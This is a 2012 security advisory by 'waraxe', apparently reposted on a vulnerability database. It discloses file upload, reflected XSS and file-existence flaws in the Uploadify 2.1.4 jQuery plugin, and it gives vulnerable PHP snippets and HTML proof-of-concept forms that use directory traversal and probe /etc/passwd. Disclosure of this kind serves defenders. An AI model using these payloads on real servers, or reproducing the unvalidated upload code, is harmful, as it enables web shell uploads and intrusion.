Uploadify 2.1.4 Cross Site Scripting / Shell Upload

2012.04.06
Credit: waraxe
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[waraxe-2012-SA#083] - Multiple Vulnerabilities in Uploadify 2.1.4 =============================================================================== Author: Janek Vind "waraxe" Date: 05. April 2012 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-83.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Uploadify is a jQuery plugin that integrates a fully-customizable multiple file upload utility on your website. It uses a mixture of Javascript, ActionScript, and any server-side language to dynamically create an instance over any DOM element on a page. http://www.uploadify.com/ Vulnerable versions ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Affected is Uploadify version 2.1.4. ############################################################################### 1. Arbitrary File Upload vulnerability in "uploadify.php" ############################################################################### Reason: missing input data validation Attack vector: user submitted GET or POST parameter 'folder' Preconditions: none Result: attacker can upload any files to remote system Source code snippet from script "check.php": -----------------[ source code start ]--------------------------------- if (!empty($_FILES)) { $tempFile = $_FILES['Filedata']['tmp_name']; $targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/'; $targetFile = str_replace('//','/',$targetPath) . $_FILES['Filedata']['name']; move_uploaded_file($tempFile,$targetFile); echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile); } -----------------[ source code end ]----------------------------------- We can see, that user submitted parameter 'folder' is used in argument for php function "move_uploaded_file()". There is no input data validation, therefore attacker can use directory traversal and upload files with any extension to arbitrary directory on remote system. Test: -----------------[ PoC code start ]----------------------------------- <html><body><center> <form action="http://localhost/uploadify-v2.1.4/uploadify.php" method="post" enctype="multipart/form-data"> <input type="file" name="Filedata"> <input type="hidden" name="folder" value="/../../"> <input type="submit" value="Upload test"> </form> </center></body></html> -----------------[ PoC code end ]----------------------------------- ############################################################################### 2. Reflected XSS vulnerability in "uploadify.php" ############################################################################### Reason: outputting html data without proper encoding Attack vector: user submitted GET or POST parameter 'folder' Preconditions: none Test: -----------------[ PoC code start ]----------------------------------- <html><body><center> <form action="http://localhost/uploadify-v2.1.4/uploadify.php" method="post" enctype="multipart/form-data"> <input type="file" name="Filedata"> <input type="hidden" name="folder" value="<script>alert(String.fromCharCode(88,83,83))</script>"> <input type="submit" value="Upload test"> </form> </center></body></html> -----------------[ PoC code end ]----------------------------------- Result: XSS payload execution can be observed ############################################################################### 3. File Existence Disclosure vulnerability in "check.php" ############################################################################### Reason: missing input data validation Attack vector: user submitted POST parameters Preconditions: none Result: attacker can reveal existance of files and directories on remote system Source code snippet from script "check.php": -----------------[ source code start ]--------------------------------- $fileArray = array(); foreach ($_POST as $key => $value) { if ($key != 'folder') { if (file_exists($_SERVER['DOCUMENT_ROOT'] . $_POST['folder'] . '/' . $value)) { $fileArray[$key] = $value; } } } echo json_encode($fileArray); -----------------[ source code end ]----------------------------------- We can see, that user submitted POST parameters are used in argument for php function "file_exists()". There is no input data validation, therefore attacker can use directory traversal and reveal existence of arbitrary files and directories on affected system. Test: -----------------[ PoC code start ]----------------------------------- <html><body><center> <form action="http://localhost/uploadify-v2.1.4/check.php" method="post"> <input type="hidden" name="folder" value="/../../../../../../../../etc"> <input type="hidden" name="waraxe" value="passwd"> <input type="submit" value="Test"> </form> </center></body></html> -----------------[ PoC code end ]----------------------------------- Result: {"waraxe":"passwd"} Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@yahoo.com Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------

References:

http://www.waraxe.us/advisory-83.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top